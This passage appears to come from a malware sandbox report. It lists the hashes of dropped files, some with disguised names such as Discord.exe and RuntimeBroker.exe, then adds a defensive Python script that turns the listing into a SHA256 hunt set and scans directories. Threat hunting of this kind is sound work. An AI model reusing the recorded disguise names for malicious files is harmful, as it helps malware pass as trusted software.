| SHA256 | 7f671b0f622d94aebf0c6ab2f021b18e1c60beda819bc48c0b2c6a8f5fdd7e02 |
| SHA512 | d0cfc09d01bd42e0e42564f99332030ed2ff20624bfd83a3f1bb3682fe004e90d89539f5868bba637287795e2668dd14409e2e0ed2ea1c6982c7ce11db727bb4 |
C:\Program Files\Windows Media Player\graph\graph.exe
| MD5 | 7d254439af7b1caaa765420bea7fbd3f |
| SHA1 | 7bd1d979de4a86cb0d8c2ad9e1945bd351339ad0 |
| SHA256 | d6e7ceb5b05634efbd06c3e28233e92f1bd362a36473688fbaf952504b76d394 |
| SHA512 | c3164b2f09dc914066201562be6483f61d3c368675ac5d3466c2d5b754813b8b23fd09af86b1f15ab8cc91be8a52b3488323e7a65198e5b104f9c635ec5ed5cc |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe
| MD5 | aa7c3909bcc04a969a1605522b581a49 |
| SHA1 | e6b0be06c7a8eb57fc578c40369f06360e9d70c9 |
| SHA256 | 19fcd2a83cd54c9b1c9bd9f8f6f7792e7132156b09a8180ce1da2fe6e2eeaaab |
| SHA512 | f06b7e9efe312a659fd047c80df637dba7938035b3fd5f03f4443047f4324af9234c28309b0b927b70834d15d06f0d8e8a78ba6bd7a6db62c375df3974ce8bd0 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe
| MD5 | 3ba1890c7f004d7699a0822586f396a7 |
| SHA1 | f33b0cb0b9ad3675928f4b8988672dd25f79b7a8 |
| SHA256 | 5243e946c367c740d571141cdbc008339559c517efaf3061475a1eced7afaed2 |
| SHA512 | 66da498ce0136c20c9a6af10c477d01b2fe4c96fe48bb658996e78c249f3e88dc1fda2f60f78106a0b967de4c95698b2cb9983d1a599e67753223d915116189d |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe
| MD5 | aa002f082380ecd12dedf0c0190081e1 |
| SHA1 | a2e34bc5223abec43d9c8cff74643de5b15a4d5c |
| SHA256 | f5626994c08eff435ab529331b58a140cd0eb780acd4ffe175e7edd70a0bf63c |
| SHA512 | 7062de1f87b9a70ed4b57b7f0fa1d0be80f20248b59ef5dec97badc006c7f41bcd5f42ca45d2eac31f62f192773ed2ca3bdb8d17ccedea91c6f2d7d45f887692 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe
| MD5 | d88e2431abac06bdf0cd03c034b3e5e3 |
| SHA1 | 4a2095690ba8f1325dd10167318728447d12058a |
| SHA256 | 4d37939b6c9b1e9deb33fe59b95efac6d3b454adf56e9ee88136a543692ea928 |
| SHA512 | 7aa5317dcdf4343f1789e462f4b5d3d23f58e28b97c8c55fc4b3295bf0c26cfb5349b0a3543b05d6af8fa2bc77f488a5ece5eaaceaf5211fa98230ea9b7f49a7 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe
| MD5 | 1f8e9fec647700b21d45e6cda97c39b7 |
| SHA1 | 037288ee51553f84498ae4873c357d367d1a3667 |
| SHA256 | 9c110c0426f4e75f4384a527f0abe2232fe71f2968eb91278b16b200537d3161 |
| SHA512 | 42f6ca3456951f3e85024444e513f424add6eda9f4807bf84c91dc8ccb623be6a8e83dc40a8b6a1bc2c6fd080f2c51b719ead1422e9d1c1079795ec70953a1ad |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe
| MD5 | 21a8a7bf07bbe1928e5346324c530802 |
| SHA1 | d802d5cdd2ab7db6843c32a73e8b3b785594aada |
| SHA256 | dada298d188a98d90c74fbe8ea52b2824e41fbb341824c90078d33df32a25f3d |
| SHA512 | 1d05f474018fa7219c6a4235e087e8b72f2ed63f45ea28061a4ec63574e046f1e22508c017a0e8b69a393c4b70dfc789e6ddb0bf9aea5753fe83edc758d8a15f |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe
| MD5 | 4489c3282400ad9e96ea5ca7c28e6369 |
| SHA1 | 91a2016778cce0e880636d236efca38cf0a7713d |
| SHA256 | cc68b1903e22d22e6f0a29bcdf46825d5c57747d8eb3a75672a4d6930f60fe77 |
| SHA512 | adaeab8aa666057ff008e86f96ae6b9a36ff2f276fdd49f6663c300357f3dc10f59fac7700bb385aa35887918a830e18bddaa41b3305d913566f58aa428a72b0 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe
| MD5 | bedd5e5f44b78c79f93e29dc184cfa3d |
| SHA1 | 11e7e692b9a6b475f8561f283b2dd59c3cd19bfd |
| SHA256 | e423c72ea1a279e367f4f0a3dc7d703c67f6d09009ed9d58f9c73dac35d0a85c |
| SHA512 | 3a7924196830b52d4525b897f45feb52ec2aca6cd20437b38437f171424450fd25692bd4c67ccde2cf147f0ed6efcef395ea0e13b24f0cf606214b58cf8284de |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | d875df73e088f73e2184a25d9f306953 |
| SHA1 | db23a960077c763599f493240a8891f32e4a02d2 |
| SHA256 | 93d563d84b4cfa1b6814510eff9edfd6f50895d2daee82c0c77546e09af3d6e5 |
| SHA512 | f767fca1d6ac4012a0c8bff0ea64215a7c22304938343a36eaa3da816eab84efd510101af7ce778a7c756db26e51f03bb4d9ee77dd243d5baf71c41dec4aecc8 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe
| MD5 | 7ae9e9867e301a3fdd47d217b335d30f |
| SHA1 | d8c62d8d73aeee1cbc714245f7a9a39fcfb80760 |
| SHA256 | 932cb7b1080180487be4b5754bd92600409bafda80d412018a792a8930c6a46c |
| SHA512 | 063648705e1817a1df82c9a595e4bbe8e0b1dbb7e31a6517df59905ebe7f22160f4acb55349d03dfe70744a14fd53c59a4c657c7a96646fcccf1c2214fc803dd |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | f2a6d712202f3372aa14b08df18c5746 |
| SHA1 | 8dffb481433b14f5b1d18576d976002f264da3fe |
| SHA256 | 926155f84e029905ad6b6003640d1eb1b3187356e87fde0bc03e9071bcf28124 |
| SHA512 | 664de7bd7a51839e2121fb598a4c0e6ba287b8a7ee1c94e4bd35992c53530e7634725a4b41039dafba78872aaadfe9e424f17a0a0d89ec350186f70a43874ddb |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | b7334b32575b4eb3e6ca7d7e18d40b95 |
| SHA1 | 5fcdd7fc28fec14cc9b1e1b55838dd06edbb7823 |
| SHA256 | 6e4ff1d8fb2785a7290c83869e5cc6c9650d8b5e18ea09dcd5822b3dc64755e6 |
| SHA512 | e4ca4eaaa78ce0ec1939959948860817af63c972900d2025655ebc3ce6636e0a38dd8b1c1402fefa3e510e46543c035da6eb81ebe0dd030699805de3d19aa615 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe
| MD5 | e9a138d8c5ab2cccc8bf9976f66d30c8 |
| SHA1 | e996894168f0d4e852162d1290250dfa986310f8 |
| SHA256 | e63b41bfdd3a89b6ebcfc05db158fdc399dbc081e49b01498831a62df34defc3 |
| SHA512 | 5982fc759c8b1121ab5befaac53e1521931f06d276140195fa1fcbcd1069f546253e366ef4cc37245b3bc2ed60c4b8d0583f133a1264efd77938adf456a08ccc |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 23b610453b906b379aa1378dc3f63851 |
| SHA1 | 989e5c6704eedc6a9b1090d055c877f26a45e127 |
| SHA256 | 8ae6dcd63b254c835053c5dbaedb240ba0095f240677c93fb4fe0e4d048c7a1e |
| SHA512 | b5b7cc08c736fecf214e36d831d7fe85221503b559ba98b795840a0e67eb0deb219a559bef33dc7245f0cc771412338ef7b21e804d6ee6de5e1a612389d79a73 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | f2d587fb5cce9f7abff2a247bf1f4055 |
| SHA1 | 2d2a1bcb66197b820093cbb0c55cde53dca8a267 |
| SHA256 | 8dd18881efc3dacab0fa8273519d7f083630d1e9b0ec2b5db5bcf7231f79e2aa |
| SHA512 | cc93b5a9d0fb3ef5581e3b434685b75082663ad1cd99e4f68255d9761bb3560e4f5a257534c6c165f628dea577dd92c1363f3403e3e1483f2cb92ba32d1758f1 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 51f4c8da03bbab1b3d5d980f220e4cb7 |
| SHA1 | 5b738e48459af58a1761e97cc13480f578868439 |
| SHA256 | 3b4d62edd5b89c949b4ca9d8e0ad541f849e28dff34ebd490ab29de43e64b6ef |
| SHA512 | 53fecb4a0920a27fe306d7ecbf0caa24e4749dca6427fbd9135018e48055979ec2f1c41fdcf8c0dbf9089379d9d3da8c2f4f7aa3cb16cfaf054ba927ac3c9c30 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 7071376797f74183787bb675f76f19f0 |
| SHA1 | b699cc00e2bb8f3044ae8769151daf5224a5bd11 |
| SHA256 | 063c816aa825cc8838a3fa60cc5ae14c6498904c5135e154ac221f142f29f004 |
| SHA512 | 4554e088051170c8156f740863fbd95302a0d6eec5b6e9bfe23d3ff465606708e2af853a9bb3502e32d1471744cb6e199e9a04bebe446e19396a117b6bba929f |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 21d3f0579f44e37424c87fbb4a31a5cc |
| SHA1 | 22a000fc0d984903b8a3eae54858d03f815e4a1c |
| SHA256 | 7326edddd6950df323a8114cc4166e13c135a0889c63ecedbb564b62bf6983a3 |
| SHA512 | b3bfb8754e77702d824301644361d7beb3ab613ffdb3f9e4afc83d0057f4aea8955021dbe36d9d7061b6695b76ffefa049255f7132656e21fea0a60645fe048d |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 1a6b79fb9b811768f2c066d7b0f5a88b |
| SHA1 | 96fc8b08183b5874896f7aaf08507060b2f83113 |
| SHA256 | 00b9f0f407e29ef59ae9ee0e3edb2784d203c6378e87ba113c69df65b12ec456 |
| SHA512 | 9db3a41aa1c9211c371d62e742816ebc44cf6ae2076530229306f10ec5ab0a0fc98be3e1f97fca4b5ededaf94bc221a652ba225ecc546b1f6085ddba27c1ad8d |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe
| MD5 | f51d5ee4178228fc8282e0a3dae84860 |
| SHA1 | c2c768c6f5d3feafa37864d4363e97910086f44d |
| SHA256 | ab66fb52ab23e136dd294b2637707d7edd2c02f88d20c7ff5884ae2966a83a44 |
| SHA512 | 528ea823361dc1d0b9678593783d6165a8c420cb4a89e1842b5e4fad290e7722d391dcf202e9122fb70187b7d6e9cc4550f16ea8eba518ac9f6e30615f069105 |
C:\Users\Admin\AppData\Local\Temp\MSIA5DC.tmp
| MD5 | 39415f3ea0e75203e7de8dfc6f05d28e |
| SHA1 | 2b859a319033eb6a32bd41b1636af23177050173 |
| SHA256 | 7751e2d1cd2af8798eb1273bccab5ab61c1a7c99573aaf8e6f511e1de8393360 |
| SHA512 | 28e29088e584090063ba90f0b39c1a26a77da7a35c84625f6af900b91598a16c2f98c511f4edd73211ecbffd2a23273b661e0e0ce1d189ca2712f2f5b83bd343 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe
| MD5 | 732746a9415c27e9c017ac948875cfcb |
| SHA1 | 95d5e92135a8a530814439bd3abf4f5cc13891f4 |
| SHA256 | e2b3f3c0255e77045f606f538d314f14278b97fd5a6df02b0b152327db1d0ff6 |
| SHA512 | 1bf9591a04484ed1dab7becb31cd2143c7f08b5667c9774d7249dbd92cf29a98b4cabfa5c6215d933c99dc92835012803a6011245daa14379b66a113670fbb08 |
C:\Windows\AB9511B1EE52494CA9BAED6A1536F012.TMP\WiseCustomCalla3.dll
| MD5 | 7e51f18024f4724408fb91f911cd0a44 |
| SHA1 | 8a705fa5a840d3fa54d4884f4acb3bea55330c91 |
| SHA256 | b79493d5687c7d80c5af5c65920736f416a2c9de961d409087b67db74e70be29 |
| SHA512 | abbc60ea30453651b6a013cf0c86f02f27ecf748a802df2e9aea7b8dde47cb3587f6d5ef563f9078ca5acc18d45d18ee8f9eeb42c30b046a6eb107f3a3b8e650 |
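The dropped-file listing above is only useful for hunting once it is turned into a hash set, and two properties of this particular listing matter when doing that: the same path (`C:\Users\Admin\AppData\Local\Temp\Log.tmp`) appears repeatedly with different digests because the sample rewrote it during the run, so that path's hash is not a stable indicator, and several rows are run artifacts rather than payloads (the Edge profile `Preferences` file, the `7z.exe` helper, the PyInstaller `_MEI70882\libffi-8.dll`), so matching on every row will produce hits that do not identify this threat. The script below is an added example, not tooling from the report or the sandbox that produced it. It assumes the row format as it appears on this page (a path line followed by `| MD5 | … |`, `| SHA1 | … |`, `| SHA256 | … |`, `| SHA512 | … |` rows), validates digest lengths so transcription errors are caught before an indicator goes into a blocklist, flags rewritten paths, and matches files on disk by SHA256. The embedded sample listing is constructed from three entries copied from the report above (`xworm.exe` and two of the `Log.tmp` rewrites).

```python
"""Turn a sandbox report's dropped-file listing into a hunt-ready hash set.

Listing format (as on the report page): a file path on its own line, then
"| MD5 | <hex> |", "| SHA1 | <hex> |", "| SHA256 | <hex> |", "| SHA512 | <hex> |"
rows for that file. The same path may recur with different digests when the
sample overwrote the file during the run.
"""
import hashlib
import os
import re
from dataclasses import dataclass, field

# Hex length each algorithm must have; anything else is a transcription error.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")

# Constructed sample: three entries copied from the report (xworm.exe and two
# of the Log.tmp rewrites). Any other rows from the page parse the same way.
SAMPLE_LISTING = r"""
C:\Users\Admin\Desktop\4363463463464363463463463\Files\xworm.exe
| MD5 | f25ef9e7998ae6d7db70c919b1d9636b |
| SHA1 | 572146d53d0d7b3c912bc6a24f458d67b77a53fe |
| SHA256 | 7face24db4aa43220ebc4d3afb6c739307f8b653c686b829fb1cb6091695c113 |
| SHA512 | d8682cdb5876f9ffe6aa8856d5ffa8c168afd25fc927781d80d129491fa04aabf045f01d13ffb51e3db9773367cc00fce466e1ef7af11bfc3d7af13df06cc17c |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | d875df73e088f73e2184a25d9f306953 |
| SHA1 | db23a960077c763599f493240a8891f32e4a02d2 |
| SHA256 | 93d563d84b4cfa1b6814510eff9edfd6f50895d2daee82c0c77546e09af3d6e5 |
| SHA512 | f767fca1d6ac4012a0c8bff0ea64215a7c22304938343a36eaa3da816eab84efd510101af7ce778a7c756db26e51f03bb4d9ee77dd243d5baf71c41dec4aecc8 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | f2a6d712202f3372aa14b08df18c5746 |
| SHA1 | 8dffb481433b14f5b1d18576d976002f264da3fe |
| SHA256 | 926155f84e029905ad6b6003640d1eb1b3187356e87fde0bc03e9071bcf28124 |
| SHA512 | 664de7bd7a51839e2121fb598a4c0e6ba287b8a7ee1c94e4bd35992c53530e7634725a4b41039dafba78872aaadfe9e424f17a0a0d89ec350186f70a43874ddb |
"""


@dataclass
class DroppedFile:
    path: str
    digests: dict = field(default_factory=dict)

    @property
    def name(self) -> str:
        # Report paths are Windows paths: split on backslash, not os.sep.
        return self.path.rsplit("\\", 1)[-1]


def parse_listing(text: str) -> list:
    """Parse path + digest rows into DroppedFile records, validating digest lengths."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:                      # any non-digest line starts a new entry
            current = DroppedFile(path=line)
            records.append(current)
            continue
        if current is None:
            raise ValueError(f"digest row before any path: {line}")
        algo, value = m.group(1), m.group(2).lower()
        if len(value) != DIGEST_LEN[algo]:
            raise ValueError(f"{current.path}: {algo} has {len(value)} hex chars, "
                             f"expected {DIGEST_LEN[algo]}")
        current.digests[algo] = value
    return records


def sha256_index(records) -> dict:
    """SHA256 -> list of report paths that carried that content."""
    index = {}
    for r in records:
        h = r.digests.get("SHA256")
        if h:
            index.setdefault(h, []).append(r.path)
    return index


def rewritten_paths(records) -> dict:
    """Paths listed with more than one distinct SHA256: the file was overwritten
    during the run, so a single hash for that path is not a stable indicator."""
    seen = {}
    for r in records:
        h = r.digests.get("SHA256")
        if h:
            seen.setdefault(r.path, set()).add(h)
    return {p: len(hs) for p, hs in seen.items() if len(hs) > 1}


def file_sha256(path) -> str:
    """Streaming SHA256 of a file on disk."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, index) -> list:
    """Walk root and return (local_path, [report paths]) for each file whose
    SHA256 is in the index. Unreadable files are skipped rather than fatal."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                h = file_sha256(p)
            except OSError:
                continue
            if h in index:
                hits.append((p, index[h]))
    return hits


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    print(f"{len(recs)} entries, {len(sha256_index(recs))} distinct SHA256s")
    for path, n in rewritten_paths(recs).items():
        print(f"rewritten {n}x during the run: {path}")
```

`parse_listing` deliberately treats every non-digest line as a new path, which is correct for the listing as it appears here but will turn any prose line pasted in with it into a bogus entry; feed it only the path-and-row block. Paths with no `SHA256` row are kept in the records but never enter the index, and `rewritten_paths` is the check to run before promoting any single hash for a recurring path such as `Log.tmp` to a blocklist.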